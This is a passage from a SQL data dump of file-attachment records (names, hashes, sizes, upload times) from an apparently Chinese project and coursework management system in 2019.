15:59:53',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(548,NULL,'Memo','42ecd82dcb7ab4e42c2c639bd3d715fe','190815160006_42ecd82dcb7ab4e42c2c639bd3d715fe',24792,'image/jpeg','5e5add7868409fc796bd5bb637785f6f',7,50,'2019-08-15 16:00:06',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(549,NULL,'Memo','323eaa52517e1d758c30ced0d8029d6d','190815160018_323eaa52517e1d758c30ced0d8029d6d',22172,'image/jpeg','709a3a3da4a7bd51d2a5cc385dca1c08',7,50,'2019-08-15 16:00:18',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(550,NULL,'Memo','40ef0ebb1f9c224ca40d6103aa382bbd','190815160029_40ef0ebb1f9c224ca40d6103aa382bbd',11249,'image/jpeg','5e4903b83d19a999d294fbc2be7226b4',7,50,'2019-08-15 16:00:29',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(551,NULL,'Memo','72605f5decaaf2266002536428aaef43','190815160039_72605f5decaaf2266002536428aaef43',10431,'image/jpeg','24fc3d8ecfac1e83137e70167720283c',7,50,'2019-08-15 16:00:39',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(552,NULL,'Memo','fa96ba308d901661c9b7b5d7b56eec5b','190815160049_fa96ba308d901661c9b7b5d7b56eec5b',5088,'image/jpeg','159cfd9322b5476e031f5194dbd198e2',7,50,'2019-08-15 16:00:49',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(553,NULL,'Memo','dfe60c22f8771fe03b750c33d51f4152','190815160100_dfe60c22f8771fe03b750c33d51f4152',10998,'image/jpeg','12a33b7a126b249def20a482f51873a4',7,50,'2019-08-15 16:01:00',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(554,NULL,'Memo','be3ee7faf0fdd41df897458ec38530bb','190815160112_be3ee7faf0fdd41df897458ec38530bb',11959,'image/jpeg','9794dbec0c9916934027890772367bbe',7,50,'2019-08-15 16:01:12',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(555,NULL,'Memo','f2895a36edcab843c953acab89fb7625','190815160123_f2895a36edcab843c953acab89fb7625',18285,'image/jpeg','7a8f9b22799dc0da45841eb4928fa936',7,50,'2019-08-15 16:01:23',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(556,NULL,'Memo','a299e11f3181f63df5daefb5db3364b5','190815160134_a299e11f3181f63df5daefb5db3364b5',13383,'image/jpeg','674b2ca6d40e4e8e51b43a5594485560',7,50,'2019-08-15 16:01:34',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(557,NULL,'Memo','db247f9d39a8c01209a7151acf6fb3e3','190815160152_db247f9d39a8c01209a7151acf6fb3e3',40560,'image/jpeg','e783bd80996a3b410df91ad119f8ee1e',7,50,'2019-08-15 16:01:52',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(558,NULL,'Memo','bcacb5cc790ccebbcc4489ceca7206bc','190815160201_bcacb5cc790ccebbcc4489ceca7206bc',61657,'image/jpeg','6aab19c067bf7576b8a84237de85caf7',0,50,'2019-08-15 16:02:01',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(559,NULL,'Memo','396aab63b5c10489f94232ca631b6bc1','190815160229_396aab63b5c10489f94232ca631b6bc1',61657,'image/jpeg','6aab19c067bf7576b8a84237de85caf7',7,50,'2019-08-15 16:02:29',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(560,NULL,'Memo','24e6038dc3e402aebff2e56d4087f3f4','190815161107_24e6038dc3e402aebff2e56d4087f3f4',281751,'image/png','125a3f0c372f931465c0fd00ad92dd1c',1,50,'2019-08-15 16:11:07',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(561,NULL,'Memo','1f6c47a5633512c7007961e4af06f661','190815161514_1f6c47a5633512c7007961e4af06f661',603521,'image/png','ced7cee984cd9bcf80266a8080404260',1,50,'2019-08-15 16:15:14',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(562,NULL,'Memo','feff1dfcf06998d481a31516a565acc5','190815162030_feff1dfcf06998d481a31516a565acc5',871575,'image/png','36b3800f2195449cfeeb58c6a9b3192e',1,50,'2019-08-15 16:20:30',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(563,NULL,'Memo','5ec26c47d1fc50f8705c282074016942','190815162101_5ec26c47d1fc50f8705c282074016942',853678,'image/png','5a6610da63699550e90f0ef066804fd3',1,50,'2019-08-15 16:21:01',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(564,NULL,'Memo','b34c7f1a3d6271839f439ac329475f5e','190815162110_b34c7f1a3d6271839f439ac329475f5e',832785,'image/png','ddf98b12318222710c6303f7b25ee32a',1,50,'2019-08-15 16:21:10',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(565,NULL,'Memo','c2adacb3d6752592df591c84f8e3bea7','190815162201_c2adacb3d6752592df591c84f8e3bea7',161571,'image/png','6f87598f2ef628862cc85fc38677ffb7',1,50,'2019-08-15 16:22:01',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(566,NULL,'Memo','35305ad007d86ca2827261ca07b53b34','190815162212_35305ad007d86ca2827261ca07b53b34',536860,'image/png','09ea8822d9939524f94ff16a62c3ff5f',1,50,'2019-08-15 16:22:12',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(567,NULL,'Memo','2a2db3de75f4d0d1522af6d3f6e84ae8','190815162257_2a2db3de75f4d0d1522af6d3f6e84ae8',1092764,'image/png','cb390c4f33b64d0a83a6556ad6da09d2',1,50,'2019-08-15 16:22:57',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(568,NULL,'Memo','9fd430a15742678bc69a0319cf241ad6','190815162323_9fd430a15742678bc69a0319cf241ad6',358478,'image/png','25fa185493893b765fbb6c836bd4222e',1,50,'2019-08-15 16:23:23',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(569,NULL,'Memo','eca915ae5a3ea140774c2e4b83f1e4cf','190815162358_eca915ae5a3ea140774c2e4b83f1e4cf',464957,'image/png','425d9ce825b8bc2902efa8885d407dae',30,50,'2019-08-15 16:23:58',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(570,NULL,'Memo','f129a0667ca4bdb5b18a2df862c28a27','190815162442_f129a0667ca4bdb5b18a2df862c28a27',617914,'image/png','83c0d2fd3ab4b910abd3306e4c00dc24',32,50,'2019-08-15 16:24:42',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(571,NULL,'Memo','2d8413f9a0b8e29feb818ed74bcb3de8','190815162457_2d8413f9a0b8e29feb818ed74bcb3de8',692792,'image/png','7174c14b00180ce19a4d6f9c3fef69de',36,50,'2019-08-15 16:24:57',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(572,NULL,'Memo','fa45e0aa28f424c03dafe64c9be7bac1','190815162556_fa45e0aa28f424c03dafe64c9be7bac1',657535,'image/png','5e1e0cc3285a783a582193ada1090380',30,50,'2019-08-15 16:25:56',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(573,NULL,'Memo','8a156885be0891f649a54567a29b08fd','190815162607_8a156885be0891f649a54567a29b08fd',423039,'image/png','3254be6b5f0f692b1c2834cb0543a069',30,50,'2019-08-15 16:26:07',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(574,NULL,'Memo','39aaca8eabcb2c26b914bd873b05aaec','190815162637_39aaca8eabcb2c26b914bd873b05aaec',1031971,'image/png','64e1ebf9fac642d357e82d26b1b7ebe1',30,50,'2019-08-15 16:26:37',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(575,NULL,'Memo','ef6fafe8354addf02a99741b00f9f68a','190815162708_ef6fafe8354addf02a99741b00f9f68a',554519,'image/png','2fac47963090bc14a29e21b692435783',31,50,'2019-08-15 16:27:08',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(576,NULL,'Memo','325d6e33df71ac1bd869318fb2ff8866','190815162723_325d6e33df71ac1bd869318fb2ff8866',899495,'image/png','3e39d2fab71424a799da06442911ccdb',30,50,'2019-08-15 16:27:23',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(753,235,'Memo','u=3502448212,667583139&fm=26&gp=0.jpg','190816083414_715381b6aa2b7044b9ea5274bff60eb5.jpg',55091,'image/jpeg','42e74fd37581b9f0e3c2ebd934670b26',657,50,'2019-08-16 08:34:14',NULL,'2019/08',1,1,NULL,NULL,1,NULL,1,0,NULL),(755,239,'Memo','8f002553bd3643fac3411375ae8a1705.jpg','190816083918_8f002553bd3643fac3411375ae8a1705.jpg',83760,'image/jpeg','39ed9f93b1ab711f77c526f8e8b684a0',69,50,'2019-08-16 08:39:18',NULL,'2019/08',1,1,NULL,NULL,1,NULL,1,0,NULL),(757,240,'Memo','fba62c5215c2d8b049b24a2f9b4201e4.jpg','190816100734_fba62c5215c2d8b049b24a2f9b4201e4.jpg',43740,'image/jpeg','07102406392f5c1317b0ff93ea88052d',418,50,'2019-08-16 10:07:34',NULL,'2019/08',1,1,NULL,NULL,1,NULL,1,0,NULL),(759,NULL,NULL,'QQ截图20190826100636.png','190826101216_ad0d8fff55197db062f79411201fbcbf.png',78397,'','944bab7acc86ef21be7107a49db649cb',0,50,'2019-08-26 10:12:16',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(760,NULL,'IssueImage','d55e0ce572aeef0f6d99a6929df5a46b','190902085614_d55e0ce572aeef0f6d99a6929df5a46b',23075,'image/jpeg','103206716ec0ff5857d88c56a0f60bb2',0,50,'2019-09-02 08:56:14',NULL,'2019/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(761,134,'IssueImage','6d2214c2735bf02131e9b7a2a9500562','190902100415_6d2214c2735bf02131e9b7a2a9500562',23075,'image/jpeg','103206716ec0ff5857d88c56a0f60bb2',1,50,'2019-09-02 10:04:15',NULL,'2019/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(762,51,'Paper','gitignore','190906085221_gitignore',1021,'','831c214c7193bf15f0de4898e13035bf',0,20,'2019-09-06 08:52:21',NULL,'2019/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(764,52,'Paper','序列号.txt','190916103245_054fb3932a281b0b2a6832cd82c20507.txt',29,'','3437aeb89135a50b7a555be7956f008b',0,56,'2019-09-16 10:32:45',NULL,'2019/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(768,NULL,'ProjectImage','550d4a96b0507438a2852cfe98ae530b','191023151926_550d4a96b0507438a2852cfe98ae530b',5325,'image/jpeg','5a31a3698ba2e10298caa438b4f314b2',0,46,'2019-10-23 15:19:26',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(769,169,'Project','T1xFK4BbZC1RCvBVdK.jpg','191023153633_T1xFK4BbZC1RCvBVdK.jpg',5325,NULL,'5a31a3698ba2e10298caa438b4f314b2',1,46,'2019-10-23 15:36:33','','2019/10',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(770,62,'Issue','Ruby.txt','191023161407_Ruby.txt',12393,NULL,'ad7307425173ee26ffb0271719adecb1',0,46,'2019-10-23 16:14:07','','2019/10',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(771,62,'Issue','Ruby安装.txt','191023161522_893c05b1c6a253905193bcfe5ffc05b1.txt',1506,NULL,'c390d5f6b07b555ecfe6ccc21b26d0ad',0,46,'2019-10-23 16:15:22','','2019/10',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(772,63,'Issue','bug_消息通知02.png','191023164520_5abafcb2efc18c2bd8380882ce9f97a8.png',158411,NULL,'5f464539620ff7acb1f43f0cced386c8',0,49,'2019-10-23 16:45:20','','2019/10',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(773,63,'Issue','消息通知--白屏01.png','191023164645_e5546940251605e3d5d24f1bc045ecce.png',308379,NULL,'212cdff9472390888d5830110e45aaa9',0,49,'2019-10-23 16:46:45','','2019/10',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(774,63,'Issue','消息通知--白屏02.png','191023164646_ce3e9763c6516bbe24503b137ba8db09.png',158236,NULL,'2e93743812d5496701a1f3f1281089ab',0,49,'2019-10-23 16:46:46','','2019/10',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(777,53,'Paper','sqlite3.db','191025100823_sqlite3.db',4096,'','da7a87956ef49df6fc707d5e2268fd7c',0,46,'2019-10-25 10:08:23',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(778,5,'Task','sqlite3.db','191025101933_sqlite3.db',4096,'','da7a87956ef49df6fc707d5e2268fd7c',0,46,'2019-10-25 10:19:33',NULL,'2019/10',2,1,NULL,NULL,1,NULL,0,1571969980,NULL),(779,54,'Paper','新建文本文档 (4).txt','191025144227_87b09dadbae9e4b2e06fbbfdd28008bd.txt',461,'','ee301026768c8f604075a99202bee101',1,50,'2019-10-25 14:42:27',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(780,55,'Paper','rubymine.txt','191025144303_rubymine.txt',37,'','8752adcc264596d50230f4b9ec4c42b8',0,2,'2019-10-25 14:43:03',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(781,56,'Paper','问题.txt','191025144344_a46276016f50cf16c8bb3c92820f6688.txt',561,'','1b8140f93980b7ac43f7add243495a4c',1,50,'2019-10-25 14:43:44',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(782,25,'Task','SSH.docx','191025150504_SSH.docx',22872,'','9be718a63afe811c7625ad22367698d8',0,49,'2019-10-25 15:05:04',NULL,'2019/10',2,1,NULL,NULL,1,NULL,0,1571987281,NULL),(783,20,'Review','开源协议.docx','191025152106_8b6bca14c3281624d797b8e6a71d4714.docx',24760,'','234ec463fb39dfcff600129db7196c7b',0,49,'2019-10-25 15:21:06',NULL,'2019/10',3,1,NULL,NULL,1,NULL,0,0,NULL),(784,NULL,NULL,'问题.txt','191025152200_a46276016f50cf16c8bb3c92820f6688.txt',561,'','1b8140f93980b7ac43f7add243495a4c',0,50,'2019-10-25 15:22:00',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(785,21,'Review','sqlite3.db','191025152443_sqlite3.db',4096,'','da7a87956ef49df6fc707d5e2268fd7c',0,49,'2019-10-25 15:24:43',NULL,'2019/10',4,1,NULL,NULL,1,NULL,0,0,NULL),(786,57,'Paper','12345.png','191025152949_12345.png',42048,'','b8ae7ff4c04578ba34bfbe5b8207bc97',0,2,'2019-10-25 15:29:49',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(787,58,'Paper','tasks.xlsx','191025153022_tasks.xlsx',8923,'','90f9397a27ca2280194a9d463e52a11c',0,50,'2019-10-25 15:30:22',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(788,59,'Paper','sqlite3.db','191025153057_sqlite3.db',4096,'','da7a87956ef49df6fc707d5e2268fd7c',0,46,'2019-10-25 15:30:57',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(789,29,'Task','rubymine.txt','191025153322_rubymine.txt',37,'','8752adcc264596d50230f4b9ec4c42b8',0,49,'2019-10-25 15:33:22',NULL,'2019/10',2,1,NULL,NULL,1,NULL,0,1571988858,NULL),(790,29,'Task','SSH.docx','191025153322_SSH.docx',22872,'','9be718a63afe811c7625ad22367698d8',0,49,'2019-10-25 15:33:22',NULL,'2019/10',2,1,NULL,NULL,1,NULL,0,1571988858,NULL),(792,29,'Task','开源协议.docx','191025153843_8b6bca14c3281624d797b8e6a71d4714.docx',24760,'','234ec463fb39dfcff600129db7196c7b',0,46,'2019-10-25 15:38:43',NULL,'2019/10',3,1,NULL,NULL,1,NULL,0,0,NULL),(793,NULL,NULL,'问题.txt','191025154017_a46276016f50cf16c8bb3c92820f6688.txt',561,'','1b8140f93980b7ac43f7add243495a4c',0,50,'2019-10-25 15:40:17',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(795,NULL,NULL,'问题.txt','191025154152_a46276016f50cf16c8bb3c92820f6688.txt',561,'','1b8140f93980b7ac43f7add243495a4c',0,50,'2019-10-25 15:41:52',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(796,NULL,NULL,'问题.txt','191025154211_a46276016f50cf16c8bb3c92820f6688.txt',561,'','1b8140f93980b7ac43f7add243495a4c',0,50,'2019-10-25 15:42:11',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(798,NULL,NULL,'新建文本文档 (4).txt','191025154242_87b09dadbae9e4b2e06fbbfdd28008bd.txt',461,'','ee301026768c8f604075a99202bee101',0,50,'2019-10-25 15:42:42',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(803,NULL,NULL,'Git的使用.docx','191025154636_148c1cf3f2b78d6b11b9f1a03a7e2ba6.docx',210095,'','0760e16909f7b29a41274faafdb56f91',0,46,'2019-10-25 15:46:36',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(806,NULL,NULL,'问题.txt','191025154834_a46276016f50cf16c8bb3c92820f6688.txt',561,'','1b8140f93980b7ac43f7add243495a4c',0,50,'2019-10-25 15:48:34',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(807,NULL,NULL,'coding','191025155137_coding',212,'','659c4aa5871bc7271ff3e1916a7dbf2d',0,50,'2019-10-25 15:51:37',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(808,NULL,NULL,'Git的使用.docx','191025155351_148c1cf3f2b78d6b11b9f1a03a7e2ba6.docx',210095,'','0760e16909f7b29a41274faafdb56f91',0,46,'2019-10-25 15:53:51',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(809,NULL,NULL,'开源协议.docx','191025160216_8b6bca14c3281624d797b8e6a71d4714.docx',24760,'','234ec463fb39dfcff600129db7196c7b',0,46,'2019-10-25 16:02:16',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(810,9,'Task','开源协议.docx','191025160544_8b6bca14c3281624d797b8e6a71d4714.docx',24760,'','234ec463fb39dfcff600129db7196c7b',0,46,'2019-10-25 16:05:44',NULL,'2019/10',4,1,NULL,NULL,1,NULL,0,0,NULL),(811,29,'Task','问题.txt','191025160811_a46276016f50cf16c8bb3c92820f6688.txt',561,'','1b8140f93980b7ac43f7add243495a4c',0,50,'2019-10-25 16:08:11',NULL,'2019/10',4,1,NULL,NULL,1,NULL,0,0,NULL),(812,60,'Paper','12345.png','191025161255_12345.png',42048,'','b8ae7ff4c04578ba34bfbe5b8207bc97',1,2,'2019-10-25 16:12:55',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(815,61,'Paper','开源协议.docx','191025161710_8b6bca14c3281624d797b8e6a71d4714.docx',24760,'','234ec463fb39dfcff600129db7196c7b',0,46,'2019-10-25 16:17:10',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(816,26,'Task','产生秘钥.docx','191025161855_d31e0f10eb63701aa7e8213d8c8c7757.docx',17208,'','c917758b012839031ee61663ab7fbcb5',0,49,'2019-10-25 16:18:55',NULL,'2019/10',2,1,NULL,NULL,1,NULL,0,1571991589,NULL),(817,26,'Task','SSH.docx','191025161855_SSH.docx',22872,'','9be718a63afe811c7625ad22367698d8',0,49,'2019-10-25 16:18:55',NULL,'2019/10',2,1,NULL,NULL,1,NULL,0,1571991589,NULL),(818,26,'Task','开源协议.docx','191025162441_8b6bca14c3281624d797b8e6a71d4714.docx',24760,'','234ec463fb39dfcff600129db7196c7b',0,46,'2019-10-25 16:24:41',NULL,'2019/10',3,1,NULL,NULL,1,NULL,0,0,NULL),(820,26,'Task','开源协议.docx','191025162630_8b6bca14c3281624d797b8e6a71d4714.docx',24760,'','234ec463fb39dfcff600129db7196c7b',0,46,'2019-10-25 16:26:30',NULL,'2019/10',4,1,NULL,NULL,1,NULL,0,0,NULL),(821,62,'Paper','SSH.docx','191027141205_SSH.docx',22872,'','9be718a63afe811c7625ad22367698d8',0,46,'2019-10-27 14:12:05',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(822,63,'Paper','设计.rar','191027141208_15828de26871c5f0d6b5796a91143179.rar',454,'','6da0a5d17365e1d0d149da1a03b03dda',1,2,'2019-10-27 14:12:08',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(823,64,'Paper','设计.rar','191027141601_15828de26871c5f0d6b5796a91143179.rar',454,'','6da0a5d17365e1d0d149da1a03b03dda',1,50,'2019-10-27 14:16:01',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(824,30,'Task','开源协议.docx','191027141854_8b6bca14c3281624d797b8e6a71d4714.docx',24760,'','234ec463fb39dfcff600129db7196c7b',0,46,'2019-10-27 14:18:54',NULL,'2019/10',2,1,NULL,NULL,1,NULL,0,1572157345,NULL),(825,25,'Review','开源协议.docx','191027142749_8b6bca14c3281624d797b8e6a71d4714.docx',24760,'','234ec463fb39dfcff600129db7196c7b',0,49,'2019-10-27 14:27:49',NULL,'2019/10',3,1,NULL,NULL,1,NULL,0,0,NULL),(826,NULL,NULL,'TCP数据段格式.docx','191027143209_57f1e062fa190c320c9201c968a0ed7d.docx',1312147,'','2ddc89cdc86f7e06288bf489749f34da',0,49,'2019-10-27 14:32:09',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(827,NULL,NULL,'TCP数据段格式.docx','191027143218_57f1e062fa190c320c9201c968a0ed7d.docx',1312147,'','2ddc89cdc86f7e06288bf489749f34da',0,49,'2019-10-27 14:32:18',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(828,26,'Review','TCP数据段格式.docx','191027143227_57f1e062fa190c320c9201c968a0ed7d.docx',1312147,'','2ddc89cdc86f7e06288bf489749f34da',0,49,'2019-10-27 14:32:27',NULL,'2019/10',4,1,NULL,NULL,1,NULL,0,0,NULL),(836,69,'Paper','SSH.docx','191027150134_SSH.docx',22872,'','9be718a63afe811c7625ad22367698d8',0,46,'2019-10-27 15:01:34',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(837,70,'Paper','12345.png','191027150255_12345.png',42048,'','b8ae7ff4c04578ba34bfbe5b8207bc97',0,2,'2019-10-27 15:02:55',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(838,71,'Paper','问题.txt','191027150403_a46276016f50cf16c8bb3c92820f6688.txt',561,'','1b8140f93980b7ac43f7add243495a4c',0,50,'2019-10-27 15:04:03',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(839,32,'Task','SSH.docx','191027150655_SSH.docx',22872,'','9be718a63afe811c7625ad22367698d8',0,49,'2019-10-27 15:06:55',NULL,'2019/10',2,1,NULL,NULL,1,NULL,0,1572160165,NULL),(840,32,'Task','TCP数据段格式.docx','191027150656_57f1e062fa190c320c9201c968a0ed7d.docx',1312147,'','2ddc89cdc86f7e06288bf489749f34da',0,49,'2019-10-27 15:06:56',NULL,'2019/10',2,1,NULL,NULL,1,NULL,0,1572160165,NULL),(841,32,'Task','开源协议.docx','191027151512_8b6bca14c3281624d797b8e6a71d4714.docx',24760,'','234ec463fb39dfcff600129db7196c7b',0,46,'2019-10-27 15:15:12',NULL,'2019/10',3,1,NULL,NULL,1,NULL,0,0,NULL),(842,32,'Task','TCP数据段格式.docx','191027151709_57f1e062fa190c320c9201c968a0ed7d.docx',1312147,'','2ddc89cdc86f7e06288bf489749f34da',0,46,'2019-10-27 15:17:09',NULL,'2019/10',4,1,NULL,NULL,1,NULL,0,0,NULL),(843,NULL,NULL,'无标题文档 1','191028111506_0a040bbed1d15906026f0e02e5c63d4c',336,'','9b8415c0efd8fa5beff298e7b1d2bc47',0,2,'2019-10-28 11:15:06',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(847,NULL,NULL,'12345.png','191028113457_12345.png',42048,'','b8ae7ff4c04578ba34bfbe5b8207bc97',0,49,'2019-10-28 11:34:57',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(848,NULL,NULL,'12345.png','191028113517_12345.png',42048,'','b8ae7ff4c04578ba34bfbe5b8207bc97',0,49,'2019-10-28 11:35:17',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(849,NULL,NULL,'12345.png','191028113536_12345.png',42048,'','b8ae7ff4c04578ba34bfbe5b8207bc97',0,49,'2019-10-28 11:35:36',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(854,NULL,NULL,'问题.txt','191029083952_a46276016f50cf16c8bb3c92820f6688.txt',561,'','1b8140f93980b7ac43f7add243495a4c',0,49,'2019-10-29 08:39:52',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(860,41,'Task','问题.txt','191029093732_a46276016f50cf16c8bb3c92820f6688.txt',561,'','1b8140f93980b7ac43f7add243495a4c',0,49,'2019-10-29 09:37:32',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(867,9,'Competition','ceb958310b3ce13a13ad3d15392562fd.jpg','191030170523_ceb958310b3ce13a13ad3d15392562fd.jpg',7721,'','774af5521b565ef11d7c7a53250a00ba',17,46,'2019-10-30 17:05:23',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(868,9,'Competition','11c987ecd3167ada1dbb2d3b1d0c6671.jpg','191030170523_11c987ecd3167ada1dbb2d3b1d0c6671.jpg',416865,'','92044f70fe4847e6e71a4d8497c4ea11',15,46,'2019-10-30 17:05:23',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(869,5,'Notice','无人机竞技大赛赛事手册(更新).docx','191030172427_da533c316163ce23f47f4f0910982c8c.docx',369780,'','efaab8a8c0614ef57bc03d9dba060c59',0,46,'2019-10-30 17:24:27',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(870,NULL,NULL,'五级流水线RISC-V处理器软硬件协同仿真验证.pdf','191031170803_ed9b31ce2c021a910981f49b177cac03.pdf',309980,'','14a22a2f289bcf9bbb1b21be80efaa3d',0,46,'2019-10-31 17:08:03',NULL,'2019/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(874,49,'Task','机器人仿真的高效碰撞检测算法详细要求.rar','191101150943_ac078b6c18ff326512fe165e3139e1c3.rar',289,'','b0c27fe797d7dcedaed17b49934a7160',0,49,'2019-11-01 15:09:43',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(875,48,'Task','机器人仿真的高效碰撞检测算法详细要求.rar','191101151121_ac078b6c18ff326512fe165e3139e1c3.rar',289,'','b0c27fe797d7dcedaed17b49934a7160',0,49,'2019-11-01 15:11:21',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(876,50,'Task','软件依赖网络可视化工具开发详细要求.rar','191101151934_ea0a81e4b8b1495a8abb1358c6e801cf.rar',289,'','b0c27fe797d7dcedaed17b49934a7160',0,2,'2019-11-01 15:19:34',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(877,79,'Paper','唐艺代码及文档.rar','191101154645_3d1f460c2c0e37bff3593d724c370ae0.rar',77,'','1d162de5c6034e307eb00ef52c18062d',0,64,'2019-11-01 15:46:45',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(878,80,'Paper','张翔代码及文档 .rar','191101155826_7afddff9558faed300b48d7dcc5c5a82.rar',77,'','1d162de5c6034e307eb00ef52c18062d',0,65,'2019-11-01 15:58:26',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(882,81,'Paper','翟小玉代码及文档.rar','191101163033_beb2f87aaf4a43179ad6f6bb893dcbf4.rar',77,'','1d162de5c6034e307eb00ef52c18062d',0,63,'2019-11-01 16:30:33',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(883,54,'Task','详细要求.rar','191105103015_70a6eee3f03fdf5a30c9821f34e43ae8.rar',289,'','b0c27fe797d7dcedaed17b49934a7160',0,49,'2019-11-05 10:30:15',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(884,83,'Paper','RISC-V架构的开源处理器及SoC研究综述.pdf','191105110031_6928426c77b11cfb82faf198375349c2.pdf',1095788,'','a805bac5bf789647e477da6f725bdf88',0,46,'2019-11-05 11:00:31',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(885,87,'Paper','算法代码文档数据.rar','191105152609_cbb8c4eb571c90f35d2d66b3a2324d96.rar',77,'','1d162de5c6034e307eb00ef52c18062d',2,63,'2019-11-05 15:26:09',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(886,86,'Paper','“人体运动状态信息评级”实例分析.pdf','191105153626_9046570b0cc9034be9bce338e480748c.pdf',608110,'','c19d5b1994289eaab280e41405971785',0,64,'2019-11-05 15:36:26',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(887,54,'Task','佐证材料.rar','191105155111_98958caeac8a8c41202731fe72899052.rar',77,'','1d162de5c6034e307eb00ef52c18062d',1,49,'2019-11-05 15:51:11',NULL,'2019/11',2,1,NULL,NULL,1,NULL,0,1572940342,NULL),(889,54,'Task','协议凭证.rar','191105161413_e9ab77ebdfb733de47786d63b27ce7fb.rar',77,'','1d162de5c6034e307eb00ef52c18062d',0,50,'2019-11-05 